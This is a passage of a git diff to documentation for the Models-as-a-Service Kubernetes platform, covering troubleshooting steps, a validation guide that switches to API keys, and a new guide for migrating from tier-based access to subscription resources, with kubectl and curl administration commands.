+      If the audience is NOT `https://kubernetes.default.svc`, patch the AuthPolicy:
+
+      ```bash
+      kubectl patch authpolicy maas-api-auth-policy -n opendatahub \
+        --type=merge --patch "
+      spec:
+        rules:
+          authentication:
+            openshift-identities:
+              kubernetesTokenReview:
+                audiences:
+                  - ${AUD}
+                  - maas-default-gateway-sa"
+      ```
+
+3. **Getting `401` errors when trying to get models**: Authentication is not working for the models endpoint.
+      - [ ] Create a new API key and use it in the Authorization header
+      - [ ] Verify `gateway-auth-policy` AuthPolicy is applied
+      - [ ] Validate that the service account has `post` access to the `llminferenceservices` resource per MaaSAuthPolicy
+        - Note: this should be automated by the ODH Controller
+4. **Getting `404` errors when trying to get models**: The models endpoint is not working.
+      - [ ] Verify `model-route` HTTPRoute exist and is applied
+      - [ ] Verify the model is deployed and the `LLMInferenceService` has the `maas-default-gateway` gateway specified
+      - [ ] Verify that the model is recognized by maas-api by checking the `maas-api/v1/models` endpoint (see [Validation Guide - List Available Models](validation.md#3-list-available-models))
+5. **Rate limiting not working**: Verify AuthPolicy and TokenRateLimitPolicy are applied
+      - [ ] Verify `gateway-rate-limits` RateLimitPolicy is applied
+      - [ ] Verify TokenRateLimitPolicy is applied (e.g. gateway-default-deny or per-route policies)
+      - [ ] Verify the model is deployed and the `LLMInferenceService` has the `maas-default-gateway` gateway specified
+      - [ ] Verify that the model is rate limited by checking the inference endpoint (see [Validation Guide - Test Rate Limiting](validation.md#6-test-rate-limiting))
+      - [ ] Verify that the model is token rate limited by checking the inference endpoint (see [Validation Guide - Test Rate Limiting](validation.md#6-test-rate-limiting))
+6. **Routes not accessible (503 errors)**: Check MaaS Default Gateway status and HTTPRoute configuration
+      - [ ] Verify Gateway is in `Programmed` state: `kubectl get gateway -n openshift-ingress maas-default-gateway`
+      - [ ] Check HTTPRoute configuration and status
+
+## Additional Resources
+
+- [Validation Guide](validation.md) — Manual validation steps
+- [scripts/README.md](https://github.com/opendatahub-io/models-as-a-service/blob/main/scripts/README.md) — Deployment scripts documentation
diff --git a/docs/content/install/validation.md b/docs/content/install/validation.md
index 2256641dd..3e60bf2db 100644
--- a/docs/content/install/validation.md
+++ b/docs/content/install/validation.md
@@ -2,13 +2,8 @@
 
 This guide provides instructions for validating and testing your MaaS Platform deployment.
 
-## Namespace Reference
-
-| Component | RHOAI | ODH |
-|-----------|-------|-----|
-| MaaS API | redhat-ods-applications | opendatahub |
-| Kuadrant/RHCL | kuadrant-system | kuadrant-system |
-| Gateway | openshift-ingress | openshift-ingress |
+!!! note "Prerequisite"
+    At least one model must be deployed to validate the installation. See [Model Setup (On Cluster)](model-setup.md) to deploy sample models.
 
 ## Manual Validation (Recommended)
 
@@ -29,30 +24,35 @@ echo "Gateway endpoint: $HOST"
     echo "Using fallback gateway endpoint: $HOST"
     ```
 
-### 2. Get Authentication Token
+### 2. Get API Key
 
-For OpenShift:
+For OpenShift, create an API key (authenticate with your OpenShift token):
 
 ```bash
-TOKEN_RESPONSE=$(curl -sSk \
+API_KEY_RESPONSE=$(curl -sSk \
   -H "Authorization: Bearer $(oc whoami -t)" \
   -H "Content-Type: application/json" \
   -X POST \
-  -d '{"expiration": "10m"}' \
-  "${HOST}/maas-api/v1/tokens") && \
-TOKEN=$(echo $TOKEN_RESPONSE | jq -r .token) && \
-echo "Token obtained: ${TOKEN:0:20}..."
+  -d '{"name": "validation-key", "description": "Key for validation", "expiresIn": "1h", "subscription": "simulator-subscription"}' \
+  "${HOST}/maas-api/v1/api-keys") && \
+API_KEY=$(echo $API_KEY_RESPONSE | jq -r .key) && \
+echo "API key obtained: ${API_KEY:0:20}..."
 ```
 
+!!! warning "API key shown only once"
+    The plaintext API key is returned **only at creation time**. We do not store the API key, so there is no way to retrieve it again. Store it securely when it is displayed. If you run into errors, see [Troubleshooting](troubleshooting.md).
+
 !!! note
-    For more information about how tokens work, see [Understanding Token Management](../configuration-and-management/token-management.md).
+    `subscription` is the MaaSSubscription metadata name to bind (here `simulator-subscription` matches the [maas-system](https://github.com/opendatahub-io/models-as-a-service/tree/main/docs/samples/maas-system) free sample). Use your own name or omit the field to auto-select by `spec.priority`. For details, see [Understanding Token Management](../configuration-and-management/token-management.md).
 
 ### 3. List Available Models
 
+Each API key is bound to one MaaSSubscription at creation time. `GET /v1/models` with an API key does not require `X-MaaS-Subscription`—the list is scoped to that subscription. (With an OpenShift user token instead of an API key, you can optionally send `X-MaaS-Subscription` to filter when you have access to multiple subscriptions.)
+
 ```bash
 MODELS=$(curl -sSk ${HOST}/maas-api/v1/models \
     -H "Content-Type: application/json" \
-    -H "Authorization: Bearer $TOKEN" | jq -r .) && \
+    -H "Authorization: Bearer $API_KEY" | jq -r .) && \
 echo $MODELS | jq . && \
 MODEL_NAME=$(echo $MODELS | jq -r '.data[0].id') && \
 MODEL_URL=$(echo $MODELS | jq -r '.data[0].url') && \
@@ -64,7 +64,7 @@ echo "Model URL: $MODEL_URL"
 Send a request to the model endpoint (should get a 200 OK response):
 
 ```bash
-curl -sSk -H "Authorization: Bearer $TOKEN" \
+curl -sSk -H "Authorization: Bearer $API_KEY" \
   -H "Content-Type: application/json" \
   -d "{\"model\": \"${MODEL_NAME}\", \"prompt\": \"Hello\", \"max_tokens\": 50}" \
   "${MODEL_URL}/v1/completions" | jq
@@ -87,39 +87,14 @@ Send multiple requests to trigger rate limit (should get 200 OK followed by 429
 ```bash
 for i in {1..16}; do
   curl -sSk -o /dev/null -w "%{http_code}\n" \
-    -H "Authorization: Bearer $TOKEN" \
+    -H "Authorization: Bearer $API_KEY" \
     -H "Content-Type: application/json" \
     -d "{\"model\": \"${MODEL_NAME}\", \"prompt\": \"Hello\", \"max_tokens\": 50}" \
     "${MODEL_URL}/v1/completions"
 done
 ```
 
-### 7. Verify Component Status
-
-Check that all components are running:
-
-```bash
-kubectl get pods -n maas-api && \
-kubectl get pods -n kuadrant-system && \
-kubectl get pods -n kserve && \
-kubectl get pods -n llm
-```
-
-Check Gateway status:
-
-```bash
-kubectl get gateway -n openshift-ingress maas-default-gateway
-```
-
-Check that policies are enforced:
-
-```bash
-kubectl get authpolicy -A && \
-kubectl get tokenratelimitpolicy -A && \
-kubectl get llminferenceservices -n llm
-```
-
-See the deployment scripts documentation at `scripts/README.md` for more information about validation and troubleshooting.
+See the deployment scripts documentation at `scripts/README.md` and the [Troubleshooting](troubleshooting.md) guide for more information.
 
 ## Automated Validation
 
@@ -156,55 +131,4 @@ kubectl run curl --rm -it --image=curlimages/curl -- \
 
 For detailed TLS configuration options, see [TLS Configuration](../configuration-and-management/tls-configuration.md).
 
-## Troubleshooting
-
-### Common Issues
-
-1. **Getting `501` Not Implemented errors**: Traffic is not making it to the Gateway.
-      - [ ] Verify Gateway status and HTTPRoute configuration
-2. **Getting `401` Unauthorized errors when trying to get a token**: Authentication maas-api is not working.
-      - [ ] Verify `maas-api-auth-policy` AuthPolicy is applied
-      - [ ] Check if your cluster uses a custom token review audience:
-
-      ```bash
-      # Detect your cluster's audience
-      AUD="$(kubectl create token default --duration=10m 2>/dev/null | \
-        cut -d. -f2 | jq -Rr '@base64d | fromjson | .aud[0]' 2>/dev/null)"
-      echo "Cluster audience: ${AUD}"
-      ```
-
-      If the audience is NOT `https://kubernetes.default.svc`, patch the AuthPolicy:
-
-      ```bash
-      # For RHOAI:
-      kubectl patch authpolicy maas-api-auth-policy -n redhat-ods-applications \
-        --type=merge --patch "
-      spec:
-        rules:
-          authentication:
-            openshift-identities:
-              kubernetesTokenReview:
-                audiences:
-                  - ${AUD}
-                  - maas-default-gateway-sa"
-      ```
-
-      For ODH, use namespace `opendatahub` instead of `redhat-ods-applications`.
-3. **Getting `401` errors when trying to get models**: Authentication is not working for the models endpoint.
-      - [ ] Create a new token (default expiration is 10 minutes)
-      - [ ] Verify `gateway-auth-policy` AuthPolicy is applied
-      - [ ] Validate that `system:serviceaccounts:maas-default-gateway-tier-{TIER}` has `post` access to the `llminferenceservices` resource
-        - Note: this should be automated by the ODH Controller
-4. **Getting `404` errors when trying to get models**: The models endpoint is not working.
-      - [ ] Verify `model-route` HTTPRoute exist and is applied
-      - [ ] Verify the model is deployed and the `LLMInferenceService` has the `maas-default-gateway` gateway specified
-      - [ ] Verify that the model is recognized by maas-api by checking the `maas-api/v1/models` endpoint (see [List Available Models](#3-list-available-models))
-5. **Rate limiting not working**: Verify AuthPolicy and TokenRateLimitPolicy are applied
-      - [ ] Verify `gateway-rate-limits` RateLimitPolicy is applied
-      - [ ] Verify TokenRateLimitPolicy is applied (e.g. gateway-default-deny or per-route policies)
-      - [ ] Verify the model is deployed and the `LLMInferenceService` has the `maas-default-gateway` gateway specified
-      - [ ] Verify that the model is rate limited by checking the inference endpoint (see [Test Rate Limiting](#6-test-rate-limiting))
-      - [ ] Verify that the model is token rate limited by checking the inference endpoint (see [Test Rate Limiting](#6-test-rate-limiting))
-6. **Routes not accessible (503 errors)**: Check MaaS Default Gateway status and HTTPRoute configuration
-      - [ ] Verify Gateway is in `Programmed` state: `kubectl get gateway -n openshift-ingress maas-default-gateway`
-      - [ ] Check HTTPRoute configuration and status
+For troubleshooting common issues, see [Troubleshooting](troubleshooting.md).
diff --git a/docs/content/migration/tier-to-subscription.md b/docs/content/migration/tier-to-subscription.md
new file mode 100644
index 000000000..66f8e2f27
--- /dev/null
+++ b/docs/content/migration/tier-to-subscription.md
@@ -0,0 +1,1117 @@
+# Migration Guide: Tier-Based to Subscription Model
+
+This guide helps operators migrate from the legacy tier-based architecture (ConfigMap + gateway-auth-policy) to the new subscription-driven architecture (MaaSModelRef + MaaSAuthPolicy + MaaSSubscription).
+
+## Overview
+
+The MaaS platform has evolved from a tier-based system to a subscription model that provides:
+
+- **Per-model access control and rate limits** (instead of gateway-level)
+- **CRD-based configuration** (schema-validated, GitOps friendly)
+- **Declarative management** via maas-controller
+- **Separation of concerns** (auth vs. billing)
+
+For architectural details, see [old-vs-new-flow.md](https://github.com/opendatahub-io/models-as-a-service/blob/main/maas-controller/docs/old-vs-new-flow.md).
+
+## Prerequisites
+
+Before starting the migration:
+
+- **MaaS platform** with maas-controller installed
+- **Cluster permissions**: namespace admin for `opendatahub`, `models-as-a-service`, and model namespaces
+- **Current configuration backup**:
+  - ConfigMap `tier-to-group-mapping`
+  - Existing TokenRateLimitPolicy (gateway-level)
+  - List of LLMInferenceServices and their tier annotations
+  - Existing gateway-auth-policy (if present)
+
+## Pre-Migration Checklist
+
+- [ ] Document current tier definitions and group mappings
+- [ ] Document current rate limits per tier
+- [ ] List all deployed models and their tier annotations
+- [ ] Identify which groups have access to which models
+- [ ] Test migration procedure in non-production environment
+- [ ] Plan maintenance window (optional, see zero-downtime approach below)
+- [ ] Back up current configuration
+
+```bash
+# Backup script
+mkdir -p migration-backup
+
+# Backup tier-to-group-mapping ConfigMap if it exists
+if kubectl get configmap tier-to-group-mapping -n maas-api >/dev/null 2>&1; then
+  kubectl get configmap tier-to-group-mapping -n maas-api -o yaml > migration-backup/tier-to-group-mapping.yaml
+  echo "Backed up tier-to-group-mapping"
+else
+  echo "No tier-to-group-mapping ConfigMap found (skipping backup)"
+fi
+
+# Only backup gateway-auth-policy if it exists
+if kubectl get authpolicy gateway-auth-policy -n openshift-ingress >/dev/null 2>&1; then
+  kubectl get authpolicy gateway-auth-policy -n openshift-ingress -o yaml > migration-backup/gateway-auth-policy.yaml
+  echo "Backed up gateway-auth-policy"
+else
+  echo "No gateway-auth-policy found (skipping backup)"
+fi
+
+# Backup tokenratelimitpolicy resources if they exist
+if kubectl get tokenratelimitpolicy -n openshift-ingress >/dev/null 2>&1; then
+  kubectl get tokenratelimitpolicy -n openshift-ingress -o yaml > migration-backup/gateway-rate-limits.yaml
+  echo "Backed up tokenratelimitpolicy resources"
+else
+  echo "No tokenratelimitpolicy resources found (skipping backup)"
+fi
+
+# Backup llminferenceservice resources if they exist
+if kubectl get llminferenceservice -n llm >/dev/null 2>&1; then
+  kubectl get llminferenceservice -n llm -o yaml > migration-backup/llm-models.yaml
+  echo "Backed up llminferenceservice resources"
+else
+  echo "No llminferenceservice resources found (skipping backup)"
+fi
+```
+
+## Migration Strategies
+
+### Option A: Zero-Downtime (Recommended)
+
+Run both old and new systems in parallel, validate the new system, then switch over.
+
+**Advantages:**
+- No service interruption
+- Safe rollback if issues arise
+- Time to validate new configuration
+
+**Approach:**
+1. Install maas-controller (creates gateway defaults)
+2. Create new MaaS CRs alongside existing tier configuration
+3. Validate new system works correctly
+4. Remove old tier-based configuration
+
+### Option B: Full Cutover (Requires Downtime)
+
+Replace old system with new system in one maintenance window.
+
+**Advantages:**
+- Simpler process
+- Faster migration
+
+**Disadvantages:**
+- Service downtime during migration
+- Less time for validation
+
+## Step-by-Step Migration (Zero-Downtime)
+
+### Phase 1: Install maas-controller
+
+If maas-controller is not already installed:
+
+```bash
+# Deploy maas-controller
+kubectl apply -k deployment/base/maas-controller/default
+
+# Verify controller is running
+kubectl get pods -n opendatahub -l app=maas-controller
+
+# Check controller logs
+kubectl logs -n opendatahub -l app=maas-controller --tail=20
+
+# Verify gateway default policies were created
+kubectl get authpolicy gateway-default-auth -n openshift-ingress
+kubectl get tokenratelimitpolicy gateway-default-deny -n openshift-ingress
+```
+
+**Important:** The maas-controller creates gateway-level default policies (`gateway-default-auth` and `gateway-default-deny`) that deny unconfigured models. These work alongside your existing tier-based policies during migration.
+
+**Note:** The maas-controller automatically creates the subscription namespace when it starts:
+- **Default behavior:** Creates the `models-as-a-service` namespace
+- **Custom namespace:** If you specify `--maas-subscription-namespace custom-ns`, only `custom-ns` is created (NOT both)
+
+The controller creates **only one** subscription namespace - either the default `models-as-a-service` or your custom namespace.
+
+### Phase 2: Map Tiers to Subscriptions
+
+For each tier in your ConfigMap, create equivalent MaaS CRs for each model.
+
+#### Example: Migrating "premium" tier
+
+**OLD tier configuration** (from tier-to-group-mapping.yaml):
+```yaml
+- name: premium
+  description: Premium tier
+  level: 10
+  groups:
+    - premium-users
+    - premium-group
+```
+
+**OLD rate limit** (from gateway TokenRateLimitPolicy):
+```yaml
+spec:
+  limits:
+    premium-user-tokens:
+      rates:
+        - limit: 50000
+          window: 1m
+      when:
+        - predicate: auth.identity.tier == "premium"
+      counters:
+        - expression: auth.identity.userid
+```
+
+**OLD model annotation** (on LLMInferenceService):
+```yaml
+metadata:
+  annotations:
+    alpha.maas.opendatahub.io/tiers: '["premium","enterprise"]'
+```
+
+#### NEW subscription configuration
+
+For **each model** that premium tier can access, create:
+
+**1. MaaSModelRef** (registers model with MaaS):
+```yaml
+apiVersion: maas.opendatahub.io/v1alpha1
+kind: MaaSModelRef
+metadata:
+  name: my-model-name
+  namespace: llm  # Must be in same namespace as the LLMInferenceService
+spec:
+  modelRef:
+    kind: LLMInferenceService
+    name: my-model-name
+```
+
+Apply it:
+```bash
+kubectl apply -f maasmodelref-my-model.yaml
+```
+
+**2. MaaSAuthPolicy** (access control - who can access):
+```yaml
+apiVersion: maas.opendatahub.io/v1alpha1
+kind: MaaSAuthPolicy
+metadata:
+  name: my-model-premium-access
+  namespace: models-as-a-service
+spec:
+  modelRefs:
+    - name: my-model-name
+      namespace: llm
+  subjects:
+    groups:
+      - name: premium-users
+      - name: premium-group
+    users: []
+```
+
+Apply it:
+```bash
+kubectl apply -f maasauthpolicy-my-model-premium.yaml
+```
+
+**3. MaaSSubscription** (rate limits - billing):
+```yaml
+apiVersion: maas.opendatahub.io/v1alpha1
+kind: MaaSSubscription
+metadata:
+  name: my-model-premium-subscription
+  namespace: models-as-a-service
+spec:
+  owner:
+    groups:
+      - name: premium-users
+      - name: premium-group
+    users: []
+  modelRefs:
+    - name: my-model-name
+      namespace: llm
+      tokenRateLimits:
+        - limit: 50000  # From old TokenRateLimitPolicy
+          window: 1m
+```
+
+Apply it:
+```bash
+kubectl apply -f maassubscription-my-model-premium.yaml
+```
+
+#### Verify controller generated policies
+
+The maas-controller should automatically create Kuadrant policies:
+
+```bash
+# Check MaaSModelRef status
+kubectl get maasmodelref my-model-name -n llm -o jsonpath='{.status.phase}'
+# Expected: Ready
+
+# Check generated AuthPolicy (one per model)
+kubectl get authpolicy -n llm -l maas.opendatahub.io/model=my-model-name
+
+# Check generated TokenRateLimitPolicy (one per model)
+kubectl get tokenratelimitpolicy -n llm -l maas.opendatahub.io/model=my-model-name
+
+# View full status
+kubectl describe maasmodelref my-model-name -n llm
+```
+
+#### Automation Script
+
+To simplify migration, use the provided script:
+
+```bash
+# Generate MaaS CRs from existing tier configuration
+./scripts/migrate-tier-to-subscription.sh \
+  --tier premium \
+  --models my-model-1,my-model-2,my-model-3 \
+  --groups premium-users \
+  --rate-limit 50000 \
+  --output migration-crs/
+
+# Review generated CRs
+ls migration-crs/
+
+# Apply generated CRs
+kubectl apply -f migration-crs/
+```
+
+> **Note:** Resources generated by the migration script are automatically labeled with:
+> - `migration.maas.opendatahub.io/generated=true` - Identifies script-generated resources
+> - `migration.maas.opendatahub.io/from-tier=<tier>` - Tracks which tier they came from
+>
+> You can use these labels to manage or rollback migration resources:
+> ```bash
+> # List all script-generated resources
+> kubectl get maasmodelref -n llm -l migration.maas.opendatahub.io/generated=true
+> kubectl get maasauthpolicy,maassubscription -n models-as-a-service -l migration.maas.opendatahub.io/generated=true
+>
+> # Delete resources from a specific tier migration
+> kubectl delete maasmodelref -n llm -l migration.maas.opendatahub.io/from-tier=premium
+> kubectl delete maasauthpolicy,maassubscription -n models-as-a-service -l migration.maas.opendatahub.io/from-tier=premium
+> ```
+
+See [Migration Script](#migration-automation-script) section below for details.
+
+### Phase 3: Validate New Configuration
+
+Test each migrated model to ensure the new subscription model works correctly:
+
+```bash
+# 1. Check all MaaS CRs are Ready
+kubectl get maasmodelref -n llm
+kubectl get maasauthpolicy -n models-as-a-service
+kubectl get maassubscription -n models-as-a-service
+
+# 2. Check generated Kuadrant policies
+kubectl get authpolicy -n llm
+kubectl get tokenratelimitpolicy -n llm
+
+# 3. Test inference as a user in the premium group
+
+# ⚠️ SECURITY WARNING: Token Handling
+# The examples below store bearer tokens in shell variables, which can leak via:
+# - Shell history files (~/.bash_history, ~/.zsh_history)
+# - Process listings (ps, /proc)
+# - Environment variable dumps
+#
+# For production or sensitive environments, use one of these safer alternatives:
+#
+# Option A: Secure token file with restricted permissions
+#   mkdir -p ~/.kube/tokens
+#   chmod 700 ~/.kube/tokens
+#   oc whoami -t > ~/.kube/tokens/current
+#   chmod 600 ~/.kube/tokens/current
+#   # Use in curl: -H "Authorization: Bearer $(cat ~/.kube/tokens/current)"
+#   # Clean up after use: rm -f ~/.kube/tokens/current
+#
+# Option B: Disable shell history for this session
+#   set +o history  # Disable history (bash/zsh)
+#   TOKEN=$(oc whoami -t)
+#   # ... run commands ...
+#   unset TOKEN     # Clear token from environment
+#   set -o history  # Re-enable history
+#
+# For demonstration purposes, the examples use TOKEN variables.
+# Always clear sensitive tokens after use with: unset TOKEN
+
+oc login --username=premium-user  # Or use existing token
+
+# Discover gateway host
+HOST="maas.$(kubectl get ingresses.config.openshift.io cluster -o jsonpath='{.spec.domain}')"
+
+# Safer approach: Use token file with restricted permissions
+mkdir -p ~/.kube/tokens && chmod 700 ~/.kube/tokens
+oc whoami -t > ~/.kube/tokens/current && chmod 600 ~/.kube/tokens/current
+
+# Test model access
+curl -H "Authorization: Bearer $(cat ~/.kube/tokens/current)" \
+  "https://${HOST}/llm/my-model-name/v1/chat/completions" \
+  -H "Content-Type: application/json" \
+  -d '{"model":"my-model-name","messages":[{"role":"user","content":"test"}],"max_tokens":10}'
+
+# Expected: 200 OK with model response
+
+# 4. Test rate limiting
+for i in {1..60}; do
+  curl -s -o /dev/null -w "%{http_code}\n" \
+    -H "Authorization: Bearer $(cat ~/.kube/tokens/current)" \
+    "https://${HOST}/llm/my-model-name/v1/chat/completions" \
+    -H "Content-Type: application/json" \
+    -d '{"model":"my-model-name","messages":[{"role":"user","content":"test"}],"max_tokens":10}'
+done | sort | uniq -c
+# Expected: Mix of 200 and 429 responses based on rate limit
+
+# 5. Test unauthorized user (should get 403)
+oc login --username=unauthorized-user
+oc whoami -t > ~/.kube/tokens/current && chmod 600 ~/.kube/tokens/current
+
+curl -v -H "Authorization: Bearer $(cat ~/.kube/tokens/current)" \
+  "https://${HOST}/llm/my-model-name/v1/chat/completions" \
+  -H "Content-Type: application/json" \
+  -d '{"model":"my-model-name","messages":[{"role":"user","content":"test"}],"max_tokens":10}'
+# Expected: 403 Forbidden
+
+# Clean up token file after use
+rm -f ~/.kube/tokens/current
+
+# 6. Use validation script
+./scripts/validate-deployment.sh
+```
+
+### Phase 4: Remove Old Configuration
+
+Once new system is validated and working correctly:
+
+#### 4.1 Remove tier annotations from models
+
+```bash
+# Remove tier annotations from all models
+# Track failures to ensure all annotations are removed
+failed_models=()
+
+# Use process substitution to avoid subshell issue with pipe
+while read model; do
+  if kubectl annotate $model -n llm alpha.maas.opendatahub.io/tiers- --ignore-not-found; then
+    echo "✓ Removed tier annotation from $model"
+  else
+    echo "✗ Failed to remove tier annotation from $model" >&2
+    failed_models+=("$model")
+  fi
+done < <(kubectl get llminferenceservice -n llm -o name)
+
+# Report any failures
+if [ ${#failed_models[@]} -gt 0 ]; then
+  echo ""
+  echo "⚠️  WARNING: Failed to remove tier annotations from the following models:" >&2
+  printf '  - %s\n' "${failed_models[@]}" >&2
+  echo ""
+  echo "Please manually remove annotations from these models:" >&2
+  for model in "${failed_models[@]}"; do
+    echo "  kubectl annotate $model -n llm alpha.maas.opendatahub.io/tiers-" >&2
+  done
+  exit 1
+else
+  echo ""
+  echo "✓ Successfully removed tier annotations from all models"
+fi
+```
+
+#### 4.2 Delete old gateway-auth-policy (if exists)
+
+```bash
+# Check if gateway-auth-policy exists
+kubectl get authpolicy gateway-auth-policy -n openshift-ingress
+
+# Delete it (gateway-default-auth replaces it)
+kubectl delete authpolicy gateway-auth-policy -n openshift-ingress --ignore-not-found
+```
+
+#### 4.3 Update or remove gateway-level TokenRateLimitPolicy
+
+The old TokenRateLimitPolicy has tier-based predicates that are no longer needed.
+
+**Option A: Remove tier-based limits**
+```bash
+# Edit and remove tier-based limit rules
+kubectl edit tokenratelimitpolicy <policy-name> -n openshift-ingress
+
+# Remove sections like:
+#   premium-user-tokens:
+#     when:
+#       - predicate: auth.identity.tier == "premium"
+```
+
+**Option B: Delete if fully replaced**
+```bash
+# If gateway-default-deny provides sufficient default, delete old policy
+kubectl delete tokenratelimitpolicy <old-policy-name> -n openshift-ingress
+```
+
+**Note:** `gateway-default-deny` (created by maas-controller) provides default rate limiting (0 tokens for unconfigured models).
+
+#### 4.4 Handle tier-to-group-mapping ConfigMap
+
+**Option A: Keep ConfigMap** (if MaaS API uses it for other features)
+```bash
+# Keep ConfigMap but document that tiers are deprecated
+kubectl annotate configmap tier-to-group-mapping -n maas-api \
+  deprecated="true" \
+  deprecated-reason="Migrated to subscription model" \
+  --overwrite
+```
+
+**Option B: Delete ConfigMap** (if no longer needed)
+```bash
+# Verify MaaS API doesn't use /v1/tiers/lookup endpoint
+# Check maas-api logs for tier lookup calls
+
+# Delete ConfigMap
+kubectl delete configmap tier-to-group-mapping -n maas-api
+```
+
+### Phase 5: ODH Model Controller Considerations
+
+**Context:** If you have ODH Model Controller deployed (from `github.com/opendatahub-io/odh-model-controller`), it may manage AuthPolicies for LLMInferenceServices.
+
+#### Check if ODH Model Controller is managing AuthPolicies
+
+```bash
+# Check for ODH Model Controller deployment
+kubectl get deployment odh-model-controller -n opendatahub
+
+# Check for ODH-managed AuthPolicies
+kubectl get authpolicy -A -l app.kubernetes.io/managed-by=odh-model-controller
+```
+
+#### If ODH Model Controller manages AuthPolicies
+
+**Scenario 1: ODH creates AuthPolicies, maas-controller also creates AuthPolicies**
+
+- Potential conflict: Both controllers may try to manage policies
+- **Resolution:** Use annotation to opt out ODH management for MaaS-managed models
+
+```bash
+# Opt out ODH management for specific AuthPolicy
+kubectl annotate authpolicy <policy-name> -n <namespace> \
+  opendatahub.io/managed=false
+```
+
+**Scenario 2: Coordinate with ODH team**
+
+- Contact ODH team to understand AuthPolicy management strategy
+- Determine if ODH Model Controller's AuthPolicy creation should be disabled for MaaS models
+- Consider updating ODH Model Controller configuration
+
+**Scenario 3: No ODH Model Controller or no AuthPolicy management**
+
+- No action needed
+- maas-controller is sole owner of AuthPolicies
+
+#### Verify no conflicts
+
+```bash
+# Check for duplicate AuthPolicies targeting same HTTPRoute
+kubectl get authpolicy -A -o json | \
+  jq -r '.items[] | select(.spec.targetRef != null and .spec.targetRef.kind == "HTTPRoute") | "\(.metadata.namespace)/\(.metadata.name) -> \(.spec.targetRef.name // "<missing-target>")"' | \
+  sort
+
+# Look for multiple policies targeting the same HTTPRoute
+# Expected: One AuthPolicy per HTTPRoute (created by maas-controller)
+# If you see "<missing-target>", investigate that AuthPolicy for missing targetRef.name
+```
+
+## Migration Automation Script
+
+A migration script is provided to automate CR generation from existing tier configuration.
+
+### Usage
+
+```bash
+./scripts/migrate-tier-to-subscription.sh [OPTIONS]
+```
+
+### Options
+
+| Flag | Description | Example |
+|------|-------------|---------|
+| `--tier <name>` | Tier name from ConfigMap | `--tier premium` |
+| `--models <list>` | Comma-separated model names | `--models model1,model2` |
+| `--groups <list>` | Comma-separated group names (auto-detected if omitted) | `--groups premium-users` |
+| `--rate-limit <limit>` | Token rate limit | `--rate-limit 50000` |
+| `--window <duration>` | Rate limit window (default: 1m) | `--window 1m` |
+| `--output <dir>` | Output directory for CRs (default: migration-crs) | `--output migration-crs/` |
+| `--subscription-ns <ns>` | Subscription namespace (default: models-as-a-service) | `--subscription-ns models-as-a-service` |
+| `--model-ns <ns>` | Model namespace (default: llm) | `--model-ns llm` |
+| `--maas-ns <ns>` | MaaS namespace (default: opendatahub) | `--maas-ns opendatahub` |
+| `--dry-run` | Generate files without applying | `--dry-run` |
+| `--apply` | Apply generated CRs to cluster | `--apply` |
+| `--verbose` | Enable verbose logging | `--verbose` |
+| `--help` | Show help message | `--help` |
+
+### Examples
+
+**Example 1: Generate CRs for premium tier**
+```bash
+./scripts/migrate-tier-to-subscription.sh \
+  --tier premium \
+  --models model-a,model-b,model-c \
+  --groups premium-users \
+  --rate-limit 50000 \
+  --window 1m \
+  --output migration-crs/premium/ \
+  --dry-run
+```
+
+**Example 2: Generate and apply for all tiers**
+```bash
+# Free tier
+./scripts/migrate-tier-to-subscription.sh \
+  --tier free \
+  --models simulator,qwen3 \
+  --groups system:authenticated \
+  --rate-limit 100 \
+  --window 1m \
+  --output migration-crs/free/ \
+  --apply
+
+# Premium tier
+./scripts/migrate-tier-to-subscription.sh \
+  --tier premium \
+  --models simulator,qwen3,llama \
+  --groups premium-users \
+  --rate-limit 50000 \
+  --window 1m \
+  --output migration-crs/premium/ \
+  --apply
+
+# Enterprise tier
+./scripts/migrate-tier-to-subscription.sh \
+  --tier enterprise \
+  --models simulator,qwen3,llama,gpt \
+  --groups enterprise-users \
+  --rate-limit 100000 \
+  --window 1m \
+  --output migration-crs/enterprise/ \
+  --apply
+```
+
+**Example 3: Extract tier info from ConfigMap and generate CRs**
+```bash
+# Get tier configuration from ConfigMap
+kubectl get configmap tier-to-group-mapping -n maas-api -o yaml
+
+# Run script for each tier with extracted group and limit info
+./scripts/migrate-tier-to-subscription.sh \
+  --tier premium \
+  --groups premium-users,premium-group \
+  --models $(kubectl get llminferenceservice -n llm -o json | \
+    jq -r '[.items[]
+      | . as $item
+      | try (
+          .metadata.annotations["alpha.maas.opendatahub.io/tiers"] | fromjson
+        ) catch (
+          (env.DEBUG // "" | if . != "" then "WARN: malformed JSON in \($item.metadata.name)" | debug else empty end) | []
+        )
+      | if type == "array" and any(. == "premium") then $item.metadata.name else empty end
+    ] | join(",")') \
+  --rate-limit 50000 \
+  --output migration-crs/premium/
+```
+
+## Conversion Worksheet
+
+Use this table to plan your migration:
+
+| Old Tier | Groups | Models | Rate Limit (tokens/min) | New MaaSAuthPolicy Name | New MaaSSubscription Name |
+|----------|--------|--------|------------------------|------------------------|--------------------------|
+| free | system:authenticated | simulator, qwen3 | 100 | free-models-access | free-models-subscription |
+| premium | premium-users, premium-group | simulator, qwen3, llama | 50000 | premium-models-access | premium-models-subscription |
+| enterprise | enterprise-users, admin-group | all models | 100000 | enterprise-models-access | enterprise-models-subscription |
+
+### Worksheet Template
+
+Download and fill out this worksheet before migration:
+
+```yaml
+# migration-plan.yaml
+tiers:
+  - name: free
+    groups:
+      - system:authenticated
+    models:
+      - simulator
+      - qwen3
+    rateLimit:
+      limit: 100
+      window: 1m
+
+  - name: premium
+    groups:
+      - premium-users
+      - premium-group
+    models:
+      - simulator
+      - qwen3
+      - llama
+    rateLimit:
+      limit: 50000
+      window: 1m
+
+  - name: enterprise
+    groups:
+      - enterprise-users
+      - admin-group
+    models:
+      - simulator
+      - qwen3
+      - llama
+      - gpt
+    rateLimit:
+      limit: 100000
+      window: 1m
+```
+
+## Rollback Plan
+
+If migration fails or issues arise:
+
+### Immediate Rollback
+
+```bash
+# 1. List MaaS CRs created during migration (verify before deletion)
+echo "=== MaaSModelRef resources ==="
+kubectl get maasmodelref -n llm
+echo "=== MaaSAuthPolicy resources ==="
+kubectl get maasauthpolicy -n models-as-a-service
+echo "=== MaaSSubscription resources ==="
+kubectl get maassubscription -n models-as-a-service
+
+# 2. Delete specific MaaS CRs created during migration
+# Option A: Delete by resource name (if you know the specific names)
+kubectl delete maasmodelref my-model-name -n llm
+kubectl delete maasauthpolicy my-model-premium-access -n models-as-a-service
+kubectl delete maassubscription my-model-premium-subscription -n models-as-a-service
+
+# Option B: Delete all script-generated resources
+kubectl delete maasmodelref -n llm -l migration.maas.opendatahub.io/generated=true
